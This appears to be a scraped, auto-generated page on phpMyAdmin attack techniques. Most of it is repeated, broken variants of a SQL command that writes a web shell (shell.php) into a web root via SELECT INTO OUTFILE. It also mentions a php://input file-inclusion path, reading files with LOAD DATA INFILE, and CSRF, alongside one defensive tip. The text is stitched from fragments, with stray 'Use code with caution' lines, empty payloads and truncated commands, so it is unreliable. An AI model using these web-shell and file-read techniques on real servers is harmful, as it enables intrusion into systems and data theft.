Phpmyadmin Hacktricks

SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution. Reading Sensitive Files (LOAD DATA INFILE)

/index.php?page=php://input

SELECT '' INTO OUTFILE '/var/www/html/shell.php'; Use code with caution. 2.4. Cross-Site Request Forgery (CSRF) phpmyadmin hacktricks

: Never leave phpMyAdmin exposed to the public internet; use IP whitelisting or a VPN. SELECT ' ' INTO OUTFILE '/var/www/html/shell

SELECT "" INTO OUTFILE "/var/www/html/shell.php"; ```. Use code with caution. SELECT ' ' INTO OUTFILE '/var/www/html/shell.php'

If the logged-in user possesses FILE privileges, database commands can be leveraged to write files directly to the web root. Writing a Web Shell (SELECT INTO OUTFILE)